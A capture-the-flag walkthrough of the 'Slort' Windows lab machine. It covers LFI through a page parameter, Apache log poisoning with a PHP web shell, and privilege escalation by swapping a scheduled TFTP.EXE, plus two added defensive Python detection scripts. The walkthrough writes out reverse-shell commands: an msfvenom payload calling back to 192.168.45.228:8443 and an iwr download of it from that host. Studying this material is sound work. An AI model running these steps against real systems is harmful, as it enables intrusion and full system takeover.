Slort

Target IP: 192.168.197.53

For this machine, enumeration is key.


Reconnaissance

[screenshot]
There are plenty of TCP ports open on the target machine, as shown above.

[screenshot]
Performing an aggressive nmap scan shows the result above. The web application on port 8080 seems interesting.


Enumeration

Port 8080: HTTP
[screenshot]
The application serves the webpage shown above, which is the default webpage of a XAMPP installation.

[screenshot]
However, browsing to http://192.168.197.53:8080/site/index.php?page=main.php displays the webpage above. The URL is interesting: the page parameter is passed in the query string and the web application loads whatever file name it is given. Maybe I can perform LFI/RFI using this parameter?

[screenshot]
After some enumeration, I found that the page parameter can be used for LFI. I used ffuf with the command ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -u http://192.168.197.53:8080/site/index.php?page=FUZZ -fs 344 | grep "access.log" to find any log files that I could poison, as shown above.

[screenshot]
I found that c:/xampp/apache/logs/access.log is readable through the LFI, as shown above; therefore, I can poison it!


Exploitation

[screenshot]
I made a request to the web application and intercepted it using Burp Suite. Then I inserted and deployed my PHP web shell payload in the User-Agent header. This was successful: the log file was poisoned, and by including it I could perform RCE. Time to obtain a reverse shell connection!
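
From the defender's side, the two steps above (probing the page parameter for LFI, then poisoning access.log through the User-Agent header) both leave traces in the same Apache access log. The script below is an added example, not code from the original write-up: it parses combined-format log lines and flags any request whose page parameter is not a bare .php file name, and any User-Agent or Referer value carrying a PHP open tag. The log lines are constructed samples; the attacker IP 192.168.45.228 and the /site/index.php?page= path are the ones from the write-up, and XAMPP logging the User-Agent (combined format) is assumed, since the poisoning relies on it.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format. Apache escapes embedded quotes in header
# values as \", so the header groups accept escaped characters.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# A legitimate value of the `page` parameter is a bare file name such as
# main.php. Drive letters, slashes, "..", wrappers and remote URLs all fail this.
SAFE_PAGE_RE = re.compile(r'^[A-Za-z0-9_-]+\.php$')

# A PHP open tag in a logged header is the tell-tale of log poisoning.
PHP_TAG_RE = re.compile(r'<\?(?:php|=)?', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def check_page_param(target):
    """Return a reason string if the page= parameter looks like an LFI/RFI probe."""
    query = urlsplit(target).query          # parse_qs decodes %2F, %2E etc. once
    for value in parse_qs(query).get("page", []):
        if not SAFE_PAGE_RE.match(value):
            return f"page={value!r} is not a bare .php file name"
    return None


def scan_access_log(lines):
    """Run both checks over an iterable of log lines; return a list of findings."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        fields = parse_line(line)
        if fields is None:
            findings.append({"line": lineno, "kind": "unparsed", "detail": line.strip()[:80]})
            continue
        reason = check_page_param(fields["target"])
        if reason:
            findings.append({"line": lineno, "kind": "lfi_probe", "ip": fields["ip"], "detail": reason})
        for header in ("ua", "referer"):
            if PHP_TAG_RE.search(fields[header]):
                findings.append({"line": lineno, "kind": "log_poisoning", "ip": fields["ip"],
                                 "detail": f"PHP tag in {header}: {fields[header][:60]}"})
    return findings


# Constructed sample log (not captured from the target machine).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /site/index.php?page=main.php HTTP/1.1" 200 2961 "-" "Mozilla/5.0"',
    '192.168.45.228 - - [01/Jan/2024:10:00:05 +0000] "GET /site/index.php?page=c:/xampp/apache/logs/access.log HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.45.228 - - [01/Jan/2024:10:00:09 +0000] "GET /site/index.php?page=..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 200 412 "-" "curl/8.0"',
    '192.168.45.228 - - [01/Jan/2024:10:00:12 +0000] "GET /site/index.php?page=main.php HTTP/1.1" 200 2961 "-" "<?php /* constructed marker */ ?>"',
    '10.0.0.7 - - [01/Jan/2024:10:00:20 +0000] "GET /dashboard/ HTTP/1.1" 200 7100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['kind']} from {f.get('ip', '?')}: {f['detail']}")
```

The allowlist shape in SAFE_PAGE_RE is the same rule the application itself should enforce before calling include(); detection in the log is a compensating control, not the fix. The parameter is decoded only once, so a double-encoded probe (%252e%252e) would need a second decoding pass before the check.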

[screenshot]
Since the target machine runs Windows, I used a base64-encoded PowerShell reverse shell script. To make sure the payload is valid, I encoded all spaces as %20. Then, using the poisoned log file, I deployed my reverse shell script.

[screenshot]
And I got a hit! I successfully got a reverse shell connection on my machine at port 8443, with a session as the user rupert.


Privilege Escalation

[screenshot]
There is a Backup directory. Using icacls, I can see that the current user has full access to this directory.

[screenshot]
The binary TFTP.EXE is executed every five minutes according to the info.txt file.

[screenshot]
And I can replace this TFTP.EXE binary with a malicious one, as I have full access.
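
The weakness here is a periodically executed binary whose file, and whose parent directory, are writable by a low-privilege user. The script below is an added defender's check, not code from the original write-up: it parses the text that icacls prints for the scheduled binary and for its directory and reports every principal outside the trusted administrative set that holds a write-capable right. The icacls output is a constructed sample modelled on the finding above, with HOST as a placeholder machine name; on a real host the text would be captured with icacls <path> and fed in unchanged.

```python
import ntpath
import re

# Principals expected to be able to write to a binary that runs with high
# privilege. Any other principal with a write-capable right is a finding.
TRUSTED_PRINCIPALS = {
    "BUILTIN\\Administrators",
    "NT AUTHORITY\\SYSTEM",
    "NT SERVICE\\TrustedInstaller",
}

# icacls simple rights (F, M, W, D) and specific rights (WD write data/add
# file, AD append/add subdirectory, DE delete, WDAC write DACL, WO write owner)
# that allow replacing or altering the file, or the files inside a directory.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "DE", "WDAC", "WO"}

ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<tokens>(?:\([^)]*\))+)$")


def parse_icacls(output, path):
    """Parse icacls output for one path into [(principal, set_of_tokens), ...].
    `path` is the argument icacls was given; it prefixes the first line."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised icacls line: {raw!r}")
        tokens = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("tokens")):
            tokens.update(part.strip() for part in group.split(","))  # e.g. (RD,WD,AD)
        aces.append((m.group("principal"), tokens))
    return aces


def writable_by_untrusted(aces):
    """Principals outside TRUSTED_PRINCIPALS that are granted a write-capable right."""
    hits = []
    for principal, tokens in aces:
        if "DENY" in tokens or principal in TRUSTED_PRINCIPALS:
            continue
        if tokens & WRITE_RIGHTS:
            hits.append(principal)
    return hits


def audit_scheduled_binary(binary_path, icacls_outputs):
    """icacls_outputs maps a path to the icacls text captured for it. The
    directory is checked too: write access there is enough to rename the
    original binary and drop a replacement next to it."""
    findings = []
    for path in (binary_path, ntpath.dirname(binary_path)):
        for principal in writable_by_untrusted(parse_icacls(icacls_outputs[path], path)):
            findings.append((path, principal))
    return findings


# Constructed icacls output (HOST is a placeholder machine name).
SAMPLE_OUTPUTS = {
    r"C:\Backup\TFTP.EXE": "\n".join([
        r"C:\Backup\TFTP.EXE HOST\rupert:(I)(F)",
        r"                   BUILTIN\Administrators:(I)(F)",
        r"                   NT AUTHORITY\SYSTEM:(I)(F)",
        "",
        "Successfully processed 1 files; Failed processing 0 files",
    ]),
    r"C:\Backup": "\n".join([
        r"C:\Backup HOST\rupert:(OI)(CI)(F)",
        r"          BUILTIN\Administrators:(I)(OI)(CI)(F)",
        r"          NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)",
        r"          BUILTIN\Users:(I)(OI)(CI)(RX)",
        "",
        "Successfully processed 1 files; Failed processing 0 files",
    ]),
}

# Constructed output for the same binary after its ACL has been tightened.
HARDENED_BINARY = "\n".join([
    r"C:\Backup\TFTP.EXE BUILTIN\Administrators:(F)",
    r"                   NT AUTHORITY\SYSTEM:(F)",
    r"                   BUILTIN\Users:(RX)",
])

if __name__ == "__main__":
    for path, principal in audit_scheduled_binary(r"C:\Backup\TFTP.EXE", SAMPLE_OUTPUTS):
        print(f"WARNING: {principal} can modify {path}")
```

The check treats BUILTIN\Users with (RX) as acceptable and flags only rights that let a principal change or replace the file; an explicit (DENY) entry is skipped because it grants nothing. Running the same parser over the hardened sample returns no findings, which is the state a periodically executed binary should be in.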

[screenshot]
Using the command msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.228 LPORT=8443 -f exe -o TFTP.EXE --platform windows, I generated a malicious reverse shell executable file that connects to my machine on port 8443.

[screenshot]
On the target machine, I used the command iwr -Uri http://192.168.45.228/TFTP.EXE -Outfile TFTP.EXE to download this malicious file. I made sure to rename the original TFTP.EXE to TFTP.EXE.bak, just in case something goes wrong.

[screenshot]
After waiting for some time, I finally got a reverse shell connection on my machine at port 8443. Now I have a shell session as the user administrator. GG.


Flags

[screenshot]
The local.txt flag is shown above. It is located on the Desktop of the user rupert.

[screenshot]
The proof.txt flag, obtained after replacing TFTP.EXE with my reverse shell executable to gain a session as the user administrator, is shown above. This flag is located on the Desktop of the user administrator.